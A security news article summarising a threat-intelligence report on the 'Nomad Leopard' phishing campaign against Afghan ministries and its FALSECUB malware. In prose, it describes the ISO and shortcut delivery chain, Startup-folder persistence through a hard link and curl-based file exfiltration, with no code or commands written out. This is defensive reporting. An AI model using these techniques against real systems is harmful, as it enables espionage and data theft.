Nomad Leopard Rising: New FALSECUB Malware Targets Afghan Ministries

In recent weeks, personnel within Afghan governmental institutions have become the recipients of missives harboring documents that ostensibly mirror official decrees from the Prime Minister’s Office. Within these communications lies a persuasive document composed in Pashto, complete with the national emblem, serial numbers, dates, and rigorous administrative terminology. Yet, beneath this veneer of “officialdom” lurks a deleterious infection chain, meticulously engineered to deceive the victim into manually initiating the compromise.

Analysts from SEQRITE Labs report that they are tracking a burgeoning campaign directed at ministries and administrative bureaus. According to their telemetry, the adversaries employ a lure in the form of a government notification containing fiscal directives and a looming deadline—a stratagem designed to incite a sense of urgency and ensure the document is bypassed by standard security scrutiny.

The incursion commences with an ISO image disseminated via a GitHub link, further obscured through a TinyURL shortener. The file, christened Afghanistan Islami Emirates.iso, was first detected on December 23 and surfaced on VirusTotal the following day. The tactical advantage of an ISO file lies in the fact that Windows mounts it as a virtual drive, which often attenuates the conventional restrictions applied to files downloaded from the internet.

Within this image reside three distinct artifacts. The first is a PDF lure—the “official” decree itself. The second is a Windows shortcut (LNK file) which, upon activation, displays the PDF to allay suspicion while simultaneously invoking the subsequent phase. The third is an executable file disguised as a standard image, such as img.jpg, to appear innocuous upon a cursory inspection.

The shortcut initiates a sequence that copies the pseudo-image into the C:\ProgramData directory, subsequently utilizing the mklink command to create a hard link within the Startup folder under the pseudonym searchmgr.exe. This ensures that the malware achieves persistence, launching automatically upon subsequent system reboots while masquerading as a mundane system process.

The terminal payload, identified by researchers as FALSECUB, is authored in C++ and incorporates rudimentary anti-analysis safeguards. It scrutinizes its environment for the presence of debuggers or “sandboxes” and may enter a “sleep” state to evade detection. Once these checks are satisfied, the program establishes a connection with a command-and-control (C2) server to await further directives.

The malware’s capabilities encompass the harvesting of fundamental system telemetry—including usernames, computer nomenclature, Windows versions, and a census of connected drives—while specifically scouring the Desktop and Documents folders. Exfiltration is achieved through the covert construction of curl commands. These requests utilize custom HTTP headers containing an “access key” and victim data, transmitting files to a remote /upload/ endpoint on a non-standard port. The execution is performed silently to preclude the appearance of a console window, with subsequent efforts made to sanitize any forensic traces.

The campaign’s infrastructure reveals domains hosted on dynamic DNS and various IP addresses, including a Cloudflare node and a separate host with an exposed RDP port (3389). Intriguingly, the dissemination involved a nascent GitHub account created on December 23, which was subsequently purged. Analytical scrutiny has also linked this activity to a cluster of accounts on Scribd, Pinterest, and Dailymotion, where authentic Afghan administrative and legal documents were published. Specific indicators, including VirusTotal telemetry associated with the shortened links, suggest Pakistan as a potential point of origin for the initial uploads.

SEQRITE Labs posits that the campaign, which they have designated Nomad Leopard, appears to be the work of a regional antagonist with a burgeoning degree of technical maturity. However, the meticulous attention to detail within the lures and the curated collection of plausible documentation suggest that these targeted distributions may persist and potentially transcend the borders of Afghanistan.